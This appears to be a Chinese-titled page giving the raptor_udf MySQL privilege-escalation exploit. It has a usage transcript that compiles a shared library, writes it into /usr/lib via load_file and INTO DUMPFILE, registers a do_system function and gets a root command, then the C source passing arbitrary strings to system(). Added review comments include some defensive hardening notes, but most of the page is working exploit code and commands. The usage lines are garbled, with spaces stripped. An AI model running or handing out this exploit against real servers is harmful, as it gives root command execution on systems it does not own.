Linux mysql root 提权

*Usage:
*$id
*uid=500(raptor)gid=500(raptor)groups=500(raptor)
*$gcc-g-craptor_udf.c
*$gcc-g-shared-W1,-soname,raptor_udf.so-oraptor_udf.soraptor_udf.o-lc
*$mysql-uroot-p
*Enterpassword:
*[...]
*mysql>usemysql;
*mysql>createtablefoo(lineblob);
*mysql>insertintofoovalues(load_file('/home/raptor/raptor_udf.so'));
*mysql>select*fromfoointodumpfile'/usr/lib/raptor_udf.so';
*mysql>createfunctiondo_systemreturnsintegersoname'raptor_udf.so';
*mysql>select*frommysql.func;
*+-----------+-----+---------------+----------+
*|name|ret|dl|type|
*+-----------+-----+---------------+----------+
*|do_system|2|raptor_udf.so|function|
*+-----------+-----+---------------+----------+
*mysql>selectdo_system('id>/tmp/out;chownraptor.raptor/tmp/out');
*mysql>\!sh
*sh-2.05b$cat/tmp/out
*uid=0(root)gid=0(root)groups=0(root),1(bin),2(daemon),3(sys),4(adm)
*[...]
*/

raptor_udf.c:

#include<stdio.h>
#include<stdlib.h>

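// Type tags for UDF arguments and results; UDF_ARGS.arg_type points at
// values of this enum. The enumerators take the default values 0..3 in
// declaration order, so INT_RESULT is 2.
// NOTE(review): declared locally because the file includes only <stdio.h>
// and <stdlib.h>; presumably it mirrors the server's own definition, so
// confirm the order against the headers of the server version in use.
enum Item_result {
    STRING_RESULT,
    REAL_RESULT,
    INT_RESULT,
    ROW_RESULT
};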

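// Argument block passed to a UDF on each call.
// Every field except arg_count is a pointer to storage that this file
// never allocates; the caller of the UDF supplies it.
// NOTE(review): a local copy of the interface struct. The field order and
// types presumably have to match what the loading server uses, so verify
// against the server headers before relying on the layout.
typedef struct st_udf_args {
    unsigned int arg_count;      // number of arguments
    enum Item_result *arg_type;  // per-argument type tags
    char **args;                 // per-argument value pointers
    unsigned long *lengths;      // per-argument lengths (string arguments)
    char *maybe_null;            // per-argument flag: 1 if it may be NULL
} UDF_ARGS;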

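// Per-function state block passed as the first parameter of a UDF.
// do_system in this file accepts a pointer to it but never reads or
// writes any field.
// NOTE(review): a local copy of the interface struct; presumably it has to
// match the loading server's layout, so verify against the server headers.
typedef struct st_udf_init {
    char maybe_null;           // 1 if the function can return NULL
    unsigned int decimals;     // for real-valued functions
    unsigned long max_length;  // for string functions
    char *ptr;                 // free pointer for function data
    char const_item;           // 0 if the result is constant
} UDF_INIT;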

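// do_system - UDF entry point that hands its single argument to system().
//
// Parameters:
//   initid, is_null, error - part of the UDF calling convention; unused.
//   args                   - argument block; only arg_count and args[0]
//                            are read.
// Returns: always 0. The exit status of the command is discarded, and a
// call with any argument count other than one does nothing.
//
// SECURITY(review): this is an unrestricted command-execution primitive.
// args->args[0] reaches the shell with no check of arg_type, lengths or
// NULL, and the command runs with the identity of whatever process loaded
// the library. The transcript on this page shows uid=0(root), so that
// server was running as root.
// Defensive notes for anyone auditing a server for this pattern:
//   - run mysqld under an unprivileged account;
//   - do not grant FILE or write access to the mysql schema to
//     application accounts, and set secure_file_priv so INTO DUMPFILE
//     cannot write into a library directory;
//   - keep the library/plugin directory unwritable by the server account;
//   - review mysql.func for rows that were not deliberately installed,
//     and look for shared objects in the library directory that no
//     package owns.
int do_system(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error)
{
    // Accepted for the calling convention only.
    (void)initid;
    (void)is_null;
    (void)error;

    if (args->arg_count != 1) {
        return 0;
    }

    // Caller-controlled string, passed to the shell unchanged.
    system(args->args[0]);

    return 0;
}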
